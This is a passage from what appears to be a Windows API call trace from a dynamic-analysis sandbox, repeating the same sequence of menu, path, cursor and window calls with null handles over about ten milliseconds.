(hMenu=0x0, nPos=-1) returned 0x0 [0027.540] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.541] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.541] GetStockObject (i=6) returned 0x1b00018 [0027.541] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.541] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.541] PathFileExistsW (pszPath=0x0) returned 0 [0027.541] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.541] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.541] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.541] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.541] GetMenu (hWnd=0x0) returned 0x0 [0027.541] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.541] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.541] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.541] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.541] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.541] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.541] GetStockObject (i=6) returned 0x1b00018 [0027.541] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.541] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.541] PathFileExistsW (pszPath=0x0) returned 0 [0027.541] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.541] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.541] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.541] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.541] GetMenu (hWnd=0x0) returned 0x0 [0027.541] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.541] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.541] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.541] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.541] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.541] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.541] GetStockObject (i=6) returned 0x1b00018 [0027.541] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.542] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.542] PathFileExistsW (pszPath=0x0) returned 0 [0027.542] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.542] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.542] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.542] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.542] GetMenu (hWnd=0x0) returned 0x0 [0027.542] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x220) returned -1 [0027.542] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.542] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.542] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.542] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.542] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.542] GetStockObject (i=6) returned 0x1b00018 [0027.542] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.542] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.542] PathFileExistsW (pszPath=0x0) returned 0 [0027.542] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.542] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.542] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.542] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.542] GetMenu (hWnd=0x0) returned 0x0 [0027.542] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.542] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.542] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.542] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.542] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.542] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.542] GetStockObject (i=6) returned 0x1b00018 [0027.542] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.542] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.542] PathFileExistsW (pszPath=0x0) returned 0 [0027.542] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.542] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.543] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.543] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.543] GetMenu (hWnd=0x0) returned 0x0 [0027.543] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.543] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.543] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.543] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.543] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.543] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.543] GetStockObject (i=6) returned 0x1b00018 [0027.543] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.543] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.543] PathFileExistsW (pszPath=0x0) returned 0 [0027.543] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.543] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.543] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.543] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.543] GetMenu (hWnd=0x0) returned 0x0 [0027.543] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.543] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.543] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.543] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.543] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.543] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.543] GetStockObject (i=6) returned 0x1b00018 [0027.543] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.543] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.543] PathFileExistsW (pszPath=0x0) returned 0 [0027.543] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.543] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.543] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.543] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.544] GetMenu (hWnd=0x0) returned 0x0 [0027.544] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.544] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.544] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.544] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.544] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.544] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.544] GetStockObject (i=6) returned 0x1b00018 [0027.544] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.544] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.544] PathFileExistsW (pszPath=0x0) returned 0 [0027.544] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.544] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.544] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.544] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.544] GetMenu (hWnd=0x0) returned 0x0 [0027.544] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4cc) returned -1 [0027.544] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.544] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.544] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.544] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.544] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.544] GetStockObject (i=6) returned 0x1b00018 [0027.544] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.544] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.544] PathFileExistsW (pszPath=0x0) returned 0 [0027.544] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.544] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.544] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.544] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.544] GetMenu (hWnd=0x0) returned 0x0 [0027.544] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.544] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.544] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.545] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.545] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.545] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.545] GetStockObject (i=6) returned 0x1b00018 [0027.545] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.545] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.545] PathFileExistsW (pszPath=0x0) returned 0 [0027.545] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.545] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.545] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.545] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.545] GetMenu (hWnd=0x0) returned 0x0 [0027.545] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x334) returned -1 [0027.545] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.545] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.545] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.545] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.545] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.545] GetStockObject (i=6) returned 0x1b00018 [0027.545] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.545] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.545] PathFileExistsW (pszPath=0x0) returned 0 [0027.545] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.545] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.545] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.545] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.545] GetMenu (hWnd=0x0) returned 0x0 [0027.545] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.545] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.545] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.545] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.545] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.545] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.546] GetStockObject (i=6) returned 0x1b00018 [0027.546] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.546] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.546] PathFileExistsW (pszPath=0x0) returned 0 [0027.546] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.546] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.546] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.546] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.546] GetMenu (hWnd=0x0) returned 0x0 [0027.546] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.546] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.546] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.546] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.546] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.546] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.546] GetStockObject (i=6) returned 0x1b00018 [0027.546] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.546] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.546] PathFileExistsW (pszPath=0x0) returned 0 [0027.546] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.546] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.546] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.546] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.546] GetMenu (hWnd=0x0) returned 0x0 [0027.546] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x4d5) returned -1 [0027.546] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.546] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.546] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.546] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.546] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.546] GetStockObject (i=6) returned 0x1b00018 [0027.546] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.546] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.546] PathFileExistsW (pszPath=0x0) returned 0 [0027.546] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.547] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.547] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.547] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.547] GetMenu (hWnd=0x0) returned 0x0 [0027.547] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.547] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.547] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.547] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.547] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.547] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.547] GetStockObject (i=6) returned 0x1b00018 [0027.547] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.547] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.547] PathFileExistsW (pszPath=0x0) returned 0 [0027.547] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.547] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.547] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.547] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.547] GetMenu (hWnd=0x0) returned 0x0 [0027.547] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.547] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.547] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.547] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.547] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.547] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.547] GetStockObject (i=6) returned 0x1b00018 [0027.547] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.547] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.547] PathFileExistsW (pszPath=0x0) returned 0 [0027.547] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.547] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.547] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.548] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.548] GetMenu (hWnd=0x0) returned 0x0 [0027.548] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.548] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.548] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.548] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.548] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.548] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.548] GetStockObject (i=6) returned 0x1b00018 [0027.548] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.548] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.548] PathFileExistsW (pszPath=0x0) returned 0 [0027.548] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.548] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.548] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.548] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.548] GetMenu (hWnd=0x0) returned 0x0 [0027.548] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.548] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.548] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.548] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.548] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.548] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.548] GetStockObject (i=6) returned 0x1b00018 [0027.548] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.548] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.548] PathFileExistsW (pszPath=0x0) returned 0 [0027.548] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.548] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.548] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.548] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.548] GetMenu (hWnd=0x0) returned 0x0 [0027.548] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2c7) returned -1 [0027.548] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.549] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.549] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.549] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.549] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.549] GetStockObject (i=6) returned 0x1b00018 [0027.549] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.549] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.549] PathFileExistsW (pszPath=0x0) returned 0 [0027.549] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.549] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.549] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.549] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.549] GetMenu (hWnd=0x0) returned 0x0 [0027.549] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.549] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.549] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.549] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.549] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.549] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.549] GetStockObject (i=6) returned 0x1b00018 [0027.549] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.549] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.549] PathFileExistsW (pszPath=0x0) returned 0 [0027.549] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.549] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.549] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.549] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.549] GetMenu (hWnd=0x0) returned 0x0 [0027.549] 